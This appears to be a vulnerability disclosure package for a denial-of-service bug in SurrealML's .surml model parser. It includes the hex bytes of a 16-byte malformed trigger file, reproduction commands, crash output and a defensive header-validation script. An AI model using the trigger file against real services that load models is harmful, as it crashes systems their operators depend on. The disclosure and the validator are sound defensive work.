SurrealML Parser DoS: PoC Package
Finding: A 16-byte malformed .surml model file causes deterministic process abort in the native SurrealML parser before ONNX runtime initialization.
Impact: DoS (process abort). No RCE, no ACE, no memory corruption claimed.
Affected: surrealml==0.0.4 / libc_wrapper.so v0.1.2 (released 2025-04-29)
Route: huntr MFV (Model Format Vulnerability)
Summary
The SurrealML native parser (libc_wrapper.so) reads the first 4 bytes of a .surml file as a little-endian u32 and uses this value directly as a Vec<u8> allocation length without any bounds check. Providing a value of 0xFFFFFFFF (4,294,967,295) causes the allocator to fail, triggering a Rust panic; because the library is compiled with panic = abort, the panic immediately kills the process with SIGABRT (exit code 134).
The crash occurs before ONNX runtime initialization. The ONNX runtime is not required to reproduce this issue.
Files
| File | Description |
|---|---|
| reproduce_direct_ctypes_crash.py | Primary reproduction script (direct ctypes path) |
| mf_maxlen.surml | Trigger file (16 bytes, first u32 = 0xFFFFFFFF) |
| mf_issue20_control.surml | Control file; demonstrates prior-art distinction |
| requirements.txt | surrealml==0.0.4 |
| evidence_crash_matrix.json | 3-run crash evidence with threshold analysis |
| evidence_prior_art_distinction.json | Distinction from GitHub issue #20 |
| evidence_environment.json | Library version and ONNX bypass method |
| SHA256SUMS.txt | SHA256 hashes for all files |
Reproduction
```
pip install surrealml==0.0.4
python reproduce_direct_ctypes_crash.py
```
Expected output:
```
[INFO] surrealml version: 0.0.4
[INFO] libc_wrapper.so: <path>
[INFO] Trigger: mf_maxlen.surml (16 bytes)
[INFO] Trigger SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5
[INFO] SHA256 verified ✓
[CONTROL] Control file result: is_error=1 (safe - prior art path is fixed in v0.1.2)
[CRASH TEST] Running crash in subprocess...
[CRASH TEST] Child exit code: 134
[CRASH TEST] Child stderr: memory allocation of 4294967295 bytes failed
[RESULT] PASS - deterministic SIGABRT confirmed (exit 134, expected allocation failure message)
```
How the Crash Works
.surml file layout (first 4 bytes):

```
[0:4]                u32 LE -> header_length (used directly as Vec<u8> allocation size)
[4:4+header_length]         -> header body
```

mf_maxlen.surml:

```
ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
^^^^^^^^^^^
header_length = 4,294,967,295 bytes
```

Result: Vec::with_capacity(4294967295) -> allocator failure -> panic (abort) -> SIGABRT
The ONNX runtime is not involved. The crash occurs in load_model() before any ONNX-related code path.
ONNX bypass: link_onnx() returns an error struct (ONNX runtime extraction fails in some environments). This error is intentionally ignored in the reproduction script. The load_model() crash occurs independently.
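As an added example (not part of this PoC package or of SurrealML's own code), the following Python pre-load check applies the layout above from the defender's side: it reads the 4-byte little-endian header_length and refuses to hand the file to the native parser when that value exceeds the bytes actually present in the file or a caller-chosen cap. MAX_HEADER_LEN is an assumed value, not a SurrealML constant; the trigger bytes are those from the hex dump above, while the issue #20-shaped input and the well-formed sample are constructed here.

```python
import struct

# Trigger bytes as given in the hex dump above (first u32 LE = 0xFFFFFFFF).
TRIGGER_BYTES = bytes.fromhex("ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00")

# Constructed input shaped like the issue #20 trigger: 3717 bytes, first u32 = 757,932,081.
ISSUE20_SHAPED = struct.pack("<I", 757_932_081) + b"\x00" * 3713

# Constructed well-formed sample: length prefix of 8 followed by an 8-byte header body.
WELLFORMED = struct.pack("<I", 8) + b"\x00" * 8

# Assumed cap on a plausible header size; not a value taken from SurrealML.
MAX_HEADER_LEN = 16 * 1024 * 1024


def parse_header_length(data: bytes) -> int:
    """Read the .surml length prefix: bytes [0:4] as a little-endian u32."""
    if len(data) < 4:
        raise ValueError("file shorter than the 4-byte length prefix")
    return struct.unpack_from("<I", data, 0)[0]


def validate_surml_header(data: bytes, max_header_len: int = MAX_HEADER_LEN) -> tuple[bool, str]:
    """Bounds-check header_length before the native parser turns it into an allocation.

    Returns (accepted, reason). Both the allocation-exhaustion input and the
    issue #20 OOB input fail the same test: the header cannot fit in the file.
    """
    try:
        header_len = parse_header_length(data)
    except ValueError as exc:
        return False, str(exc)
    available = len(data) - 4
    if header_len > available:
        return False, f"header_length {header_len} exceeds {available} available bytes"
    if header_len > max_header_len:
        return False, f"header_length {header_len} exceeds cap {max_header_len}"
    return True, "ok"


def check_surml_file(path: str) -> tuple[bool, str]:
    """Validate a .surml file on disk; run this before calling load_model()."""
    with open(path, "rb") as fh:
        return validate_surml_header(fh.read())


if __name__ == "__main__":
    for name, blob in (("trigger", TRIGGER_BYTES), ("issue20", ISSUE20_SHAPED), ("ok", WELLFORMED)):
        print(name, validate_surml_header(blob))
```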
Prior-Art Distinction
This finding is distinct from GitHub issue #20:
| | Issue #20 | This Finding |
|---|---|---|
| Filed | Jan 2024 | May 2026 |
| Trigger | 3717-byte file, first u32 = 757,932,081 | 16-byte file, first u32 = 4,294,967,295 |
| Crash type | OOB slice index | Vec allocation failure |
| Crash message | `range end index ... out of range for slice` | `memory allocation of N bytes failed` |
| Fixed in v0.1.2? | Yes (returns is_error=1 safely) | No (SIGABRT) |
| Fix location | Server-side only (surrealdb PR #3773) | Not fixed in libc_wrapper.so |
Control file verification: mf_issue20_control.surml (exact issue #20 trigger) returns is_error=1 gracefully in v0.1.2. This confirms the prior-art path is handled, while the allocation-exhaustion path is not.
Non-Claims
This PoC does not claim:
- Remote code execution (RCE)
- Arbitrary code execution (ACE)
- Memory corruption / buffer overflow / heap spray
- Privilege escalation
- SurrealDB server compromise
- High or Critical severity
- CVSS score
The impact is limited to deterministic process abort (DoS) when loading an untrusted .surml file.
Trigger File
Name: mf_maxlen.surml
Size: 16 bytes
Hex: ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5